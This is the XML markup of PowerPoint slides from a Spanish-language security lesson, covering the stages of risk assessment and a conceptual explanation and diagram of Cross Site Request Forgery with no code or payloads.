                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2175734-D873-CFCC-7C59-092183A5B3EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1775271" y="2166062"/>
            <a:ext cx="1770482" cy="694777"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 15100"/>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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identificación del riesgo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flecha: cheurón 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F36D8C-2F5C-E3BA-0234-593F56E0F368}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3471644" y="2166062"/>
            <a:ext cx="1770483" cy="694777"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 15100"/>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bg1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Análisis del riesgo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Flecha: cheurón 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A888056A-CFB3-E3C1-45FF-A792D06123C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5168017" y="2166062"/>
            <a:ext cx="1770483" cy="694777"/>
          </a:xfrm>
          <a:prstGeom prst="chevron">
            <a:avLst>
              <a:gd name="adj" fmla="val 15100"/>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latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Valoración del riesgo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectángulo 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2935EB5E-3457-B76B-CE04-E6AD5FDA4B29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1701161" y="1487838"/>
            <a:ext cx="5347579" cy="307739"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AFF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000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alcance, contexto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flecha: pentágono 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19054FFD-97AA-8FB0-BB91-FF61AD3DC166}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7122851" y="1487838"/>
            <a:ext cx="772116" cy="1549213"/>
          </a:xfrm>
          <a:prstGeom prst="homePlate">
            <a:avLst>
              <a:gd name="adj" fmla="val 63551"/>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13" name="Elipse 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1469F3F4-DD27-0136-7041-DB13EC5759AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8075689" y="1332591"/>
            <a:ext cx="1969849" cy="1859706"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>REQUISITOS DE SEGURIDAD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8196BC4A-369E-4791-055F-E446FD78FBCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3204527" y="1835052"/>
            <a:ext cx="2905125" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Evaluación del riesgo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Imagen 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F12ABC6-27EC-3935-7222-F87BE64490FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2704302" y="3473941"/>
            <a:ext cx="6135129" cy="2143742"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{222E1013-5642-6F10-13A2-8DA17C8CC557}"/>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9813426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770B1-8F5E-BEE3-FADE-D5A492DCAEC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7DC6AB5-55BF-6280-D90E-AAD5EDBCC45D}"/>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25E4F34-E73C-184A-4FAF-87EEE3D03511}"/>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Amenazas: Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (CRSRF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2108379-F8F3-9EAC-6F70-99733CF9D2D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2" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2446649-9FBF-29F6-9B4B-547A8FA93B28}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535646" y="1591319"/>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3" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B19EDE8-0278-4B3B-3396-611FFBE3A9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974427" y="1682103"/>
            <a:ext cx="613188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Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fuerza al navegador </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web, que se encuentra autenticado en algún servicio, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>realizar un envío de una petición </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a una aplicación web vulnerable.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{203F2272-F5DD-F6D8-1DAF-482B86155024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535646" y="3142236"/>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5" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFB4EC71-4202-661C-CDE1-78F370047F82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974427" y="3258385"/>
            <a:ext cx="613188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La aplicación realiza la acción elegida y la acción maliciosa será realizada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>en nombre </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>del usuario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>logueado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Oval 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4381092-B7A7-D1C7-5E2F-37F2970878E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535646" y="4700516"/>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7" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91823517-9541-C0F3-1413-2F9D086E21B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1974427" y="4975221"/>
            <a:ext cx="6131881"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Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>explota la confianza </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>que </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>un usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> tiene en un sitio web.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Imagen 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B1D4D47-BFA9-3373-71CB-A0AE7EB3E6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178" y="1871850"/>
            <a:ext cx="543836" cy="543836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Imagen 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2360825F-A163-83BB-08BE-A171AEEB96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178" y="5026468"/>
            <a:ext cx="543836" cy="543836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Imagen 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CFB5B6D-3BFF-BA3D-031D-B6902B6A1E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178" y="3422768"/>
            <a:ext cx="543836" cy="543836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="004C41"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Marcador de posición de imagen 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D991515C-DD1B-62EE-1F04-85B86A13927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290" t="28839" b="13333"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8715155" y="1372290"/>
            <a:ext cx="3476845" cy="4428754"/>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1FB7A3F8-4BB5-1B2B-947E-57F1EBEFAC43}"/>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786086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7DE17-8475-2FBC-AA01-EFA40FBF6CD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EC66D2A-DCC4-785E-265E-17B57EA4BBB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1CE6F82-164A-FC06-4DAC-35E4248BF860}"/>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Amenazas: Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> (CRSRF) - Ejemplo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D84E9508-762E-4F0F-1509-74395CBAD169}"/>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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AA32C99-A42D-27F9-73BB-02293BBC9936}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8848581" y="4192422"/>
            <a:ext cx="1082899" cy="1126916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="CuadroTexto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FB7C551-BC3F-2965-33E7-D9638F90C91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="781686" y="4614788"/>
            <a:ext cx="14168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rPr>
              <a:t>Víctima</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" b="1">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB189D0D-EBFA-49E6-1FB3-CB09CD3E7370}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20952464">
            <a:off x="2773615" y="2082562"/>
            <a:ext cx="5181289" cy="369332"/>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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>1. Víctima autenticada en aplicación legítima</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Flecha: a la izquierda y derecha 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D0060EE-25A3-7BA9-DEC3-D762B6F1F3E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="608837">
            <a:off x="2953709" y="4351697"/>
            <a:ext cx="4980213" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">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7" name="CuadroTexto 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57081F55-F43A-4ACF-FF4C-A384B6C5C753}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8260066" y="5410631"/>
            <a:ext cx="22350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rPr>
              <a:t>Servidor malicioso</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB8E2F1-3F7A-2509-A41B-8407E70B4659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8301352" y="1267347"/>
            <a:ext cx="21524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rPr>
              <a:t>Servidor legítimo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Flecha: a la izquierda y derecha 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C1A2011-CA14-588B-17CA-016FAC70BBC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20952647">
            <a:off x="2956155" y="2526091"/>
            <a:ext cx="4980213" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="leftRightArrow">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0" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7EDAF0F-1DCB-C289-9C1A-EA4C84261798}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="603673">
            <a:off x="3166522" y="4659175"/>
            <a:ext cx="4395475"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>2. La víctima accede al servidor malicioso </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFE28283-F567-E597-9B2F-F59D18D0BC95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20957788">
            <a:off x="3333908" y="2897597"/>
            <a:ext cx="4416222"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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>3. El servidor malicioso hace que la víctima ejecute acción en servidor legítimo (ej. Borrar registro)</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{772E22EA-2002-2798-999C-54834B4EC498}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
